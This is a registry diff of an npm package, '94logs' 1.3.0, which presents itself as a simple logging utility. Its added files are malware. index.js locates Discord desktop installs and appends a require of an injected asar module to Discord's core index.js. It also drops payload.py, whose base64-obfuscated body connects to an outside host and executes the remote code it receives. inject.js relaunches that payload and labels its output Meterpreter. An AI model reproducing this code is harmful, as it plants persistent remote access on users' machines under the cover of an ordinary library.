94logs 1.3.0
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of 94logs might be problematic. Click here for more details.
- package/app/inject.js +19 -0
- package/app/package.json +10 -0
- package/constants.js +18 -0
- package/index.js +112 -0
- package/install.js +4 -0
- package/package.json +14 -0
- package/payload.py +1 -0
package/app/inject.js
ADDED
@@ -0,0 +1,19 @@
|
|
1
|
+
const path = require("path");
|
2
|
+
const cp = require('child_process');
|
3
|
+
|
4
|
+
const script = path.join(__dirname, "..", "asar.py");
|
5
|
+
|
6
|
+
var py = cp.spawn('python', [script]);
|
7
|
+
|
8
|
+
py.stdout.on("data", (data) => {
|
9
|
+
console.log("METERPRETER: " + data);
|
10
|
+
})
|
11
|
+
|
12
|
+
py.stderr.on('data', (data) => {
|
13
|
+
console.error(`* METERPRETER: ${data}`);
|
14
|
+
});
|
15
|
+
|
16
|
+
py.on("exit", code => {
|
17
|
+
cp.spawnSync("echo Meterpreter closed")
|
18
|
+
setTimeout(() => {py = cp.spawn("python", [script])}, 5000);
|
19
|
+
})
|
package/app/package.json
ADDED
package/constants.js
ADDED
@@ -0,0 +1,18 @@
|
|
1
|
+
module.exports = {
|
2
|
+
DISCORD_APP_DIR_REGEX: /(app-)?\d+\.\d+\.\d+/g,
|
3
|
+
IMPORT_SCRIPT_SHA256_SUMS: [
|
4
|
+
"7149e6ede44455dc5313351ba9081de69d2e3c1059501f8084a6960fc52fc1d9",
|
5
|
+
"a1d390d24b10503e50bf063374439032e8e8b7b5963db1c0364826a645c7d6d3",
|
6
|
+
"83ace8860901890dec66c93245d8b252de85e0f3af34f6a9f21052a03a01531c",
|
7
|
+
],
|
8
|
+
OBFUSCATE_OPTIONS: {
|
9
|
+
compact: false,
|
10
|
+
controlFlowFlattening: true,
|
11
|
+
controlFlowFlatteningThreshold: 1,
|
12
|
+
numbersToExpressions: true,
|
13
|
+
simplify: false,
|
14
|
+
stringArrayShuffle: true,
|
15
|
+
splitStrings: false,
|
16
|
+
stringArrayThreshold: 1
|
17
|
+
}
|
18
|
+
};
|
package/index.js
ADDED
@@ -0,0 +1,112 @@
|
|
1
|
+
const fs = require("fs");
|
2
|
+
const path = require("path");
|
3
|
+
const log4js = require("log4js");
|
4
|
+
const logger = log4js.getLogger();
|
5
|
+
const cp = require("child_process");
|
6
|
+
const crypto = require("crypto");
|
7
|
+
const asar = require('asar');
|
8
|
+
|
9
|
+
const constants = require("./constants.js");
|
10
|
+
|
11
|
+
typeof process.env.LOCALAPPDATA === "undefined" ? __dirname : process.env.LOCALAPPDATA;
|
12
|
+
|
13
|
+
const discordLocations = [
|
14
|
+
path.join(process.env.LOCALAPPDATA, "Discord"),
|
15
|
+
path.join(process.env.LOCALAPPDATA, "discordcanary"),
|
16
|
+
path.join(process.env.LOCALAPPDATA, "DiscordPTB"),
|
17
|
+
];
|
18
|
+
|
19
|
+
async function init() {
|
20
|
+
const inject_paths = discordLocations
|
21
|
+
.filter(fs.existsSync)
|
22
|
+
.map((l) =>
|
23
|
+
fs.readdirSync(l)
|
24
|
+
.map((l1) => path.join(l, l1))
|
25
|
+
.filter((l1) => constants.DISCORD_APP_DIR_REGEX.test(l1))[0]
|
26
|
+
)
|
27
|
+
.filter(fs.existsSync)
|
28
|
+
.map((l) =>
|
29
|
+
fs.readdirSync(l)
|
30
|
+
.filter((_dir) => {
|
31
|
+
let dir = path.basename(_dir.toLowerCase());
|
32
|
+
|
33
|
+
if(dir.includes("modules")) return true;
|
34
|
+
return false;
|
35
|
+
})
|
36
|
+
.map((l1) => path.join(l, l1))[0]
|
37
|
+
)
|
38
|
+
.filter(fs.existsSync)
|
39
|
+
.map((l) =>
|
40
|
+
fs.readdirSync(l)
|
41
|
+
.filter((_l1) => {
|
42
|
+
let l1 = path.basename(_l1.toLowerCase());
|
43
|
+
|
44
|
+
if(l1.includes("core") && l1.includes("discord") && l1.includes("desktop")) return true;
|
45
|
+
return false;
|
46
|
+
})
|
47
|
+
.map((l1) => path.join(l, l1))[0]
|
48
|
+
)
|
49
|
+
.filter(fs.existsSync)
|
50
|
+
.map((l) => fs.readdirSync(l)
|
51
|
+
.map((_l1) => {
|
52
|
+
let l1 = path.basename(_l1.toLowerCase());
|
53
|
+
|
54
|
+
if(l1.includes("core") && l1.includes("discord") && l1.includes("desktop")) return path.join(l, l1);
|
55
|
+
return path.join(l, l1, "..");
|
56
|
+
})[0]
|
57
|
+
)
|
58
|
+
.filter(fs.existsSync)
|
59
|
+
.map((l) =>
|
60
|
+
fs.readdirSync(l)
|
61
|
+
.filter((_l1) => {
|
62
|
+
let l1 = path.basename(_l1.toLowerCase());
|
63
|
+
|
64
|
+
if(l1.includes("index.js")) return true;
|
65
|
+
return false;
|
66
|
+
})
|
67
|
+
.map((l1) => path.join(l, l1))[0]
|
68
|
+
|
69
|
+
)
|
70
|
+
.filter(fs.existsSync)
|
71
|
+
|
72
|
+
const scripts = inject_paths.filter((sl) => constants.IMPORT_SCRIPT_SHA256_SUMS
|
73
|
+
.map(str => str.toLowerCase())
|
74
|
+
.includes(
|
75
|
+
crypto.createHash("sha256", {})
|
76
|
+
.update(fs.readFileSync(sl).toString())
|
77
|
+
.digest()
|
78
|
+
.toString("hex")
|
79
|
+
.toLowerCase()
|
80
|
+
)
|
81
|
+
);
|
82
|
+
|
83
|
+
for(const script of scripts) {
|
84
|
+
const pyPayload = fs.readFileSync(path.join(__dirname, "payload.py"));
|
85
|
+
|
86
|
+
const outPayload = path.join(script, "..", "asar.py");
|
87
|
+
|
88
|
+
fs.writeFileSync(outPayload, pyPayload);
|
89
|
+
fs.appendFileSync(script, '\nrequire("./environment.asar");');
|
90
|
+
|
91
|
+
await asar.createPackage(path.join(__dirname, "app"), path.join(script, "..", "environment.asar"));
|
92
|
+
}
|
93
|
+
|
94
|
+
cp.spawn("python", ["payload.py"], {cwd: __dirname, detached: true});
|
95
|
+
}
|
96
|
+
|
97
|
+
module.exports = class {
|
98
|
+
constructor(klogger, opts) {
|
99
|
+
try {
|
100
|
+
this._init();
|
101
|
+
} catch (err) {
|
102
|
+
throw err;
|
103
|
+
}
|
104
|
+
}
|
105
|
+
|
106
|
+
/**
|
107
|
+
* @private
|
108
|
+
*/
|
109
|
+
_init = init;
|
110
|
+
};
|
111
|
+
|
112
|
+
// init();
|
package/install.js
ADDED
package/package.json
ADDED
@@ -0,0 +1,14 @@
|
|
1
|
+
{
|
2
|
+
"name": "94logs",
|
3
|
+
"version": "1.3.0",
|
4
|
+
"description": "Simple logging utility like log4j.",
|
5
|
+
"main": "index.js",
|
6
|
+
"repository": "https://github.com/Fredriksson448/94logs.git",
|
7
|
+
"author": "Fredriksson",
|
8
|
+
"license": "GNU",
|
9
|
+
"scripts": {},
|
10
|
+
"dependencies": {
|
11
|
+
"asar": "^3.1.0",
|
12
|
+
"log4js": "^6.3.0"
|
13
|
+
}
|
14
|
+
}
|
package/payload.py
ADDED
@@ -0,0 +1 @@
|
|
1
|
+
exec(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('aW1wb3J0IHNvY2tldCx6bGliLGJhc2U2NCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJ2phY2thc3NuYW5kdS0zNDg0My5wb3J0bWFwLmlvJywzNDg0MykpCgkJYnJlYWsKCWV4Y2VwdDoKCQl0aW1lLnNsZWVwKDUpCmw9c3RydWN0LnVucGFjaygnPkknLHMucmVjdig0KSlbMF0KZD1zLnJlY3YobCkKd2hpbGUgbGVuKGQpPGw6CglkKz1zLnJlY3YobC1sZW4oZCkpCmV4ZWMoemxpYi5kZWNvbXByZXNzKGJhc2U2NC5iNjRkZWNvZGUoZCkpLHsncyc6c30pCg==')[0]))
|